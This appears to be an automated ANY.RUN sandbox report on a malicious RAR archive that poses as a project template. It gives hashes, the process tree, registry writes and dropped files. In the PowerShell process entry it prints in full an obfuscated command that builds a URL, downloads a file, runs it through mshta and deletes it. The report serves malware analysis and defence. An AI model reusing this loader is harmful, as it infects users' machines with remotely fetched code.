File name:

project templet test.rar

Full analysis: https://app.any.run/tasks/8087d036-12fb-4d70-a200-8651477296ea
Verdict: Malicious activity
Analysis date: December 04, 2023, 11:54:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

BE272940B6F1302106725B0A2EB23CF4

SHA1:

65D8E40B64902A27E226123491C2C71D91927141

SHA256:

EB430BC903C521549E7B3424C27489B673F75772279C6B5DC2FB22641A143DB9

SSDEEP:

3072:op1zK41sgeaLsmMjfNS88q/TEZ6fLcDgL29JbHPB:op1O4igNsmGfN78eTEYsgL29JbvB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Powershell version downgrade attack

      • powershell.exe (PID: 2632)
    • Reads the Internet Settings

      • mshta.exe (PID: 2600)
      • powershell.exe (PID: 2632)
  • INFO

    • Manual execution by a user

      • powershell.exe (PID: 2632)
      • WINWORD.EXE (PID: 2332)
    • Creates files or folders in the user directory

      • powershell.exe (PID: 2632)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 2600)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
All screenshots are available in the full report
Total processes
45
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Processes shown: winrar.exe, powershell.exe, mshta.exe, winword.exe

Process information

PID:
2644
CMD:
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\project templet test.rar"
Path:
C:\Program Files\WinRAR\WinRAR.exe
Parent process:
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
PID:
2632
CMD:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $ProgressPreference = 0; function nvRClWiAJT($OnUPXhNfGyEh){$OnUPXhNfGyEh[$OnUPXhNfGyEh.Length..0] -join('')}; function sDjLksFILdkrdR($OnUPXhNfGyEh){ $vecsWHuXBHu = nvRClWiAJT $OnUPXhNfGyEh; for($TJuYrHOorcZu = 0;$TJuYrHOorcZu -lt $vecsWHuXBHu.Length;$TJuYrHOorcZu += 2){ try{$zRavFAQNJqOVxb += nvRClWiAJT $vecsWHuXBHu.Substring($TJuYrHOorcZu,2)} catch{$zRavFAQNJqOVxb += $vecsWHuXBHu.Substring($TJuYrHOorcZu,1)}};$zRavFAQNJqOVxb}; $NpzibtULgyi = sDjLksFILdkrdR 'aht1.sen/hi/coucys.erstmaofershma//s:tpht'; $cDkdhkGBtl = $env:APPDATA + '\' + ($NpzibtULgyi -split '/')[-1]; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $wbpiCTsGYi = wget $NpzibtULgyi -UseBasicParsing; [IO.File]::WriteAllText($cDkdhkGBtl, $wbpiCTsGYi); & $cDkdhkGBtl; sleep 3; rm $cDkdhkGBtl;
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID:
2600
CMD:
"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Roaming\se1.hta"
Path:
C:\Windows\System32\mshta.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
PID:
2332
CMD:
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\our project templet test.docx"
Path:
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process:
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
Total events
5 223
Read events
4 927
Write events
124
Delete events
172

Modification events

(PID) Process: (2644) WinRAR.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\17F\52C64B7E
Operation: write
Name: LanguageList
Value:
en-US
(PID) Process: (2644) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 2
Value:
C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
(PID) Process: (2644) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 1
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process: (2644) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 0
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process: (2644) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value:
120
(PID) Process: (2644) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value:
80
(PID) Process: (2644) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value:
120
(PID) Process: (2644) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value:
100
(PID) Process: (2644) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Operation: write
Name: Placement
Value:
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
(PID) Process: (2644) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\General
Operation: write
Name: LastFolder
Value:
C:\Users\admin\Desktop
Executable files
1
Suspicious files
17
Text files
3
Unknown types
0

Dropped files

PID | Process | Filename | Type
2332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD3BF.tmp.cvr |
MD5:
SHA256:
2332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{37B6EAAF-4E89-413F-A8C0-4781C10BFDEF}.tmp | binary
MD5: 7C048D08625DE85F21DED702AE60244C
SHA256: 4E92A332A46DF109D2D22915E49A48FEF1DF1CBB69E3A50EC01A606E8D517CF6
2332 | WINWORD.EXE | C:\Users\admin\Desktop\~WRD0001.tmp | document
MD5: F0B6C70A002E02E2D73DCB139AA541A5
SHA256: D650DE99277D21302E2678BDF822AB19D26FD75288F6012F1CDCAD60273909D0
2332 | WINWORD.EXE | C:\Users\admin\Desktop\our project templet test.docx | document
MD5: F0B6C70A002E02E2D73DCB139AA541A5
SHA256: D650DE99277D21302E2678BDF822AB19D26FD75288F6012F1CDCAD60273909D0
2332 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | binary
MD5: 43EDEBA06E3F40F990A0C5B99B94D225
SHA256: E8E03A6A6216E05E1D2973C79B5DED68E49D2FC7736CC2E3B79654CC5003C13B
2332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso83E.tmp | compressed
MD5: 50081567133733120F98B2FAA4E09417
SHA256: 92ED2E221B7A675A011510C17ABF084BBEB963359D65E7B1C3E19E1F5D9F0BBA
2332 | WINWORD.EXE | C:\Users\admin\Desktop\~$r project templet test.docx | binary
MD5: F9E356B251CF6DC5534DD40A844B1C96
SHA256: DC226D1B0FE77A42B1CD6255BF9F000E59A2B75DE43E480DA01E94301DE667DA
2332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\msoD621.tmp | image
MD5: ED3C1C40B68BA4F40DB15529D5443DEC
SHA256: 039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
2332 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex | text
MD5: F3B25701FE362EC84616A93A45CE9998
SHA256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
2332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2722C250-0A1A-4E21-B94D-2C60EFBF8F91}.tmp | binary
MD5: 55536DBA963FF1381AC5C9558CCD4994
SHA256: F85E8A53A2D94EEDAC72A967A3B3E7F4499B239D0CF9B7374C0B0FC5137B23A6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
0
Threats
0

HTTP requests

No HTTP requests

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | | | | unknown
4 | System | 192.168.100.255:138 | | | | unknown
2588 | svchost.exe | 239.255.255.250:1900 | | | | unknown
1080 | svchost.exe | 224.0.0.252:5355 | | | | unknown

DNS requests

No data

Threats

No threats detected
No debug info